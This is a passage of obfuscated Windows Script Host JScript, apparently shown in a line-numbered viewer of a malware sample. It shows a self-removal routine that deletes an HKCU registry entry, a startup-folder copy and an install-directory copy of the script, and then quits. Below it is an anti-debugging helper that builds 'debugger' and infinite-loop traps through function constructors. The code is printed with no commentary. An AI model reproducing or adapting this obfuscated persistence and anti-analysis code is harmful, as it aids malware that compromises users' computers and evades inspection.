282 | shellobj['regdelete'] ( HKCU + WSH[_0x373146 ( '0x161', '$G#%' ) ][_0x22eae4 ( '0x17a' ) ] ( '.' ) [0x0] ), filesystemobj['deletefile'] ( startup + WSH[_0x22eae4 ( 0x15f ) ], ! ! [] ), filesystemobj['deletefile'] ( installdir + WSH['scriptname'], ! ! [] ), shellobj[_0x373146 ( '0x17b', 'i(]w' ) ] ( SaveSettings ), WSH[_0x22eae4 ( '0x143' ) ] ( ); | |
283 | break ; | |
284 | } | |
285 | } | |
286 | function sleep(_0x2c0b28) { | |
287 | var _0x2f1f4c = _0x4f83db, _0x3087a4 = new Date ( ) [_0x2f1f4c ( '0x13c', 'tSe#' ) ] ( ); | |
288 | for ( var _0x1c89e7 = 0x0 ; _0x1c89e7 < 0x989680 ; _0x1c89e7 ++ ) | |
289 | { | |
290 | if ( new Date ( ) ['getTime'] ( ) - _0x3087a4 > _0x2c0b28 ) | |
291 | break ; | |
292 | } | |
293 | } | |
294 | function _0x2150f9(_0x5ba605) { | |
295 | function _0x35b8c4(_0x586539) { | |
296 | var _0x397bed = _0x26ae, _0x4b3546 = _0x1fc1; | |
297 | if ( typeof _0x586539 === 'string' ) | |
298 | return function (_0x54187a) {
}['constructor'] ( 'while\x20(true)\x20{}' ) [_0x4b3546 ( '0x163', '8p52' ) ] ( 'counter' ); | |
299 | else | |
300 | ( '' + _0x586539 / _0x586539 )[_0x4b3546 ( 0x15a, 'Y!nA' ) ] !== 0x1 || _0x586539 % 0x14 === 0x0 ? function () {
return ! ! [ ];}[_0x4b3546 ( '0x138', 'HQ15' ) ] ( 'debu' + _0x4b3546 ( '0x144', 'ySE2' ) ) [_0x397bed ( 0x158 ) ] ( _0x4b3546 ( '0x183', 'uBWS' ) ) : function () {
return ! [ ];}[_0x397bed ( '0x179' ) ] ( _0x397bed ( '0x174' ) + _0x4b3546 ( '0x13f', 'i(]w' ) ) [_0x4b3546 ( 0x151, '2kiA' ) ] ( _0x4b3546 ( '0x178', 'U!CQ' ) ); | |
301 | _0x35b8c4 ( ++ _0x586539 ); | |
302 | } | |
303 | try | |
304 | { | |
305 | if ( _0x5ba605 ) | |
306 | return _0x35b8c4; | |
307 | else | |
308 | _0x35b8c4 ( 0x0 ); | |
309 | } | |
310 | catch ( _0x1607e6 ) | |
311 | { | |
312 | } | |
313 | } |